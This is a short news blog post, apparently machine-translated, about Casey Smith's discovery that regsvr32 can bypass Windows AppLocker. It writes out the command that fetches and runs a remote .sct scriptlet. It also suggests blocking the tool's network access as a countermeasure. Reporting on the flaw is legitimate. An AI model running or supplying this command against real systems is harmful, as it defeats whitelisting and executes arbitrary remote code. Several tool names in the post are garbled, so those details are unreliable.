Windows 7 got IT managers a new tool to control what software Windows business users to run on their PCs. AppLocker allows you to restrict access to execution of software on the system by whitelist them for certain user groups, such as administrators. In addition to preventing the employees playing during work hours, this can also prevent the execution of malware.
But last week it became clear that AppLocker can simply bypassed, simply by using a little known functionality regsrv32.exe tool that is built into Windows.
There are security researcher Casey Smith who have discovered this, which has been described by the Register.
Loads via the internet
The not so famous functionality is that regsrv32 can load and run scripts from the internet by typing the parameters something like this:
regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll
URL in the command is replaced with a script such as this concept evidence that Smith has authored. The concept proof started the command line (cmd.exe), but this should in theory be replaced by any program that exists on the PC used, also programs that are not whitelisted by AppLocker.
A collection of potentially more harmful examples, can be found here. In the video below demonstrates the simple concept proof.
Possible countermeasures
Regserv32, according to Casey very good support to load URLs, including support for redirection and HTTPS. In addition it does not require administrator privileges and command over making no changes to the Windows registry.
It is very likely that this can be exploited by malicious people to gain greater control over the system.
one possible measure, until any security fixes are available, according to CSO Online blocking regserver32.exe and possibly regsvr64.exe, firewall to Windows, so that the tool does not get network access. But users should also be possible to add the script in a locally stored file.
The site Brown Hat Security describes vulnerability as extremely serious, since it allows the execution of arbitrary code from a presumed reliable system tools.
Several websites have tried to get Microsoft to comment on the issue, apparently the company has so far not responded to the requests.
No comments:
Post a Comment